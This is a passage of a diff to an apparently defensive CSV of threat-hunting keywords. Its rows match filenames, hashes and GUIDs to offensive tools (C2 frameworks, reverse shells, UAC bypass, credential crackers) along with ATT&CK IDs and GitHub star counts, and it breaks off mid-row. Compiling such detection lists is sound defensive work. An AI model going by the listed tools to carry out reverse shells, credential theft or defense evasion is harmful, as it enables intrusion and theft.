-"*awesome-web-security*","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Web Attacks","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","10","10120","1611","2023-09-07T06:54:29Z","2017-01-29T16:50:21Z" +"*awesome-web-security*","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Web Attacks","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","10","10124","1610","2023-09-07T06:54:29Z","2017-01-29T16:50:21Z" "*awesome-windows-domain-hardening*","offensive_tool_keyword","awesome-windows-domain-hardening","A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools","T1563 - T1059 - T1547 - T1057 - T1574","TA0002 - TA0008 - TA0003 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/PaulSec/awesome-windows-domain-hardening","1","0","N/A","N/A","10","1665","280","2020-01-07T19:56:18Z","2017-02-19T19:20:38Z" -"*awk_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*awk_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*aws configure --profile exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*awsloot.py *","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" -"*axcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*aydinnyunus/PassDetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" -"*azfvgayqKwtFApcvyRedpUXculaeCCGA*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*axcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*aydinnyunus/PassDetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*azfvgayqKwtFApcvyRedpUXculaeCCGA*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*Azure-AccessPermissions.ps1*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Azure-AccessPermissions-master*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AzureAD AutoLogon Brute*","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","0","N/A","N/A","1","96","22","2023-02-17T20:11:27Z","2021-10-01T05:20:25Z" @@ -7478,46 +7623,47 @@ "*AzureADRecon.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*AzureC2Relay.zip*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*AzureC2Relay-main*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" -"*AzureHound.ps1*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*azurehound/v2*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*-b bleeding-jumbo*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*AzureHound.ps1*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*azurehound/v2*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*-b bleeding-jumbo*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*b23r0/Heroinn*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*b23r0/rsocx*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" -"*b289e30ce698eb0402babc2788ac7022b6a7db161296182e0e13fd021a3bee03*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b289e30ce698eb0402babc2788ac7022b6a7db161296182e0e13fd021a3bee03*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*b2xtranslator.xls.csproj*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"*B374K*index.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2248","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*B374K*index.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*b3rito*yodo*","offensive_tool_keyword","yodo","This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. ","T1068 - T1078 - T1529","TA0004 - TA0008","N/A","N/A","Exploitation tools","https://github.com/b3rito/yodo","1","1","N/A","N/A","3","202","34","2017-02-28T15:38:13Z","2016-11-13T21:02:03Z" -"*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" "*b4rtik/RedPeanut*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*b4rtik/RedPeanut*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1095 - T1071.004","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*B5627919-4DFB-49C6-AC1B-C757F4B4A103*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*B64_ENCODED_PAYLOAD_UUID*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*B64_ENCODED_PAYLOAD_UUID*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*b64encode*.:::-989-:::.*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*b64payloadgen.sh*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*b64stager*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*B651A53C-FAE6-482E-A590-CA3B48B7F384*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*b7671f125bb2ed21d0476a00cfaa9ed6*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*b7dec074f463b0be08dd3a707495e45c7a629502fa6dd7ef972a74a2aff72632*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*ba8fe35020bcd560c0f100bda43c2311bfdbb97aafbe367ac5077cebca59287f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*B651A53C-FAE6-482E-A590-CA3B48B7F384*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*b7671f125bb2ed21d0476a00cfaa9ed6*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b7dec074f463b0be08dd3a707495e45c7a629502fa6dd7ef972a74a2aff72632*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ba8fe35020bcd560c0f100bda43c2311bfdbb97aafbe367ac5077cebca59287f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*babelstrike.py -*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" "*BabelStrike-main*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" -"*Backdoor LNK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 